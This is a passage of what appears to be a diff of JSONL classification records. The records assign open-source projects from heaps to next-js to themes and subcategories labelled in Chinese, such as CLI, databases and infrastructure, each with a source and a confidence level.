AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"heaps","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"helidon","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"helix","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"helm","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"hls.js","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"hnswlib","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"hocuspocus","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"holoviews","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"homebrew","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"hono","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"hot-chocolate","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"htop","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"httpie","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"i18next","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端国际化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"imagemagick","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"immer","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"immich","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"自托管应用","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"influxdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ink","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"inngest","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"insightface","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"internvideo","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"invokeai","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"ionic-framework","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"ipfs","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"istio","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"jaeger","area":"projects","theme":"分布式系统","themeId":"distributed-systems","subcategory":"监控 / 分布式追踪","source":"category","confidence":"high","rawCategory":"分布式系统"} -{"slug":"janus-gateway","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"janusgraph","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"jax","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"jc","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"jellyfin","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"jenkins","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"jest","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"测试框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"jimp","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"jitsi-meet","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"jitsi-videobridge","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"jotai","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"状态管理","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"jq","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"js-joda","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"jspdf","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"just","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"k3s","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"k6","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"k9s","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"kafka","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"kakoune","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"kamailio","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"kaniko","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"kedro","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"kepler-gl","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"keras","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"kind","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"kitty","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"koa","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"kong","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"konva","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端图形 / Canvas 2D","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"krakend","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"kratos","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"ktor","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"kubebuilder","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"kubectx","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"kubernetes","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"kustomize","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"kuzu","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ky","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"kysely","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM / 查询构建器","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"label-studio","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"lame","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"lance","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"lancedb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"langchain","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"langfuse","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"lapce","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"laravel","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"layerzero","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"lazydocker","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"lazygit","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"lazyvim","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"leaflet","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"ledger-app-sdk","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"lens","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"lerna","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"leveldb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"lexical","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"编辑器与 IDE","source":"slugOverrides","confidence":"high","rawCategory":"后端 API"} -{"slug":"lf","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"librechat","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"librosa","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"libsignal","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"libvpx","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"lightdash","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"lighthouse","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"lightningcss","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端工具链","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"lima","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"lingui","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端国际化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"linkerd2","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"listr2","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"lite-xl","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"litellm-proxy","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"ai-eng","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"litestar","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"litmus","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"liveblocks","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"livekit-flutter","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"livekit","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"llama-cpp","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"llama-index","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"llamaindex","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI / RAG","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"llava-next","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"lm-evaluation-harness","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"lmdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"lmms-eval","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"lmms","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"locust","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"lodestar","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"loki","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"longhorn","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"lottie","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"动画","source":"slugOverrides","confidence":"high","rawCategory":"数据可视化"} -{"slug":"love2d","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"lsd","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"lucia","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"lunarvim","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"luxon","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端工具库","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"lwip","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"m3","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"mage","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"mailcow","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"makerdao","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"manticoresearch","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"mapbox-gl-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"maplibre-gl","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"mariadb-server","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"markdown-it","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端工具链","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"marked","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"matplotlib","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"matrix-js-sdk","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"matrix-rust-sdk","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"mattermost","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"mbedtls","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"mcp-ts-sdk","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"mediapipe","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"mediasoup","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"megatron-lm","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"meilisearch","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"melonjs","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"memcached","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"memgraph","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"mermaid","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"meshroom","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"metabase","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"metaflow","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"metamask","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"micro","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"micromark","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工程","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"micronaut","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"micropython","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"midscene","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端 / UI 自动化","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"mikro-orm","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"miller","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"milvus","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"minetest","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"minikube","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"minio","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库 / 存储","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"minisearch","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"mise","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"mlflow","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"mlt","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"mlx","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"mobx","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"moby","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"modin","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"monaco-editor","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"monero","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"mongo","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"mongodb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库 / NoSQL","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"motion-one","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端动画","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"move-language","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"msw","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 测试工具","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"mumble","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"mysql-server","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"mysql","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"nanobrowser","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI agent","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"nanostores","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"nativescript","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"nats-server","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"nats","area":"projects","theme":"分布式系统","themeId":"distributed-systems","subcategory":"消息队列","source":"category","confidence":"high","rawCategory":"分布式系统"} -{"slug":"ncdu","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nebula","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"neo4j","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"neovim","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"nerdctl","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"nestjs","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"后端框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"nethermind","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"neutralinojs","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"next-intl","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"next-js","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架 / 全栈","source":"category","confidence":"high","rawCategory":"后端 API"} 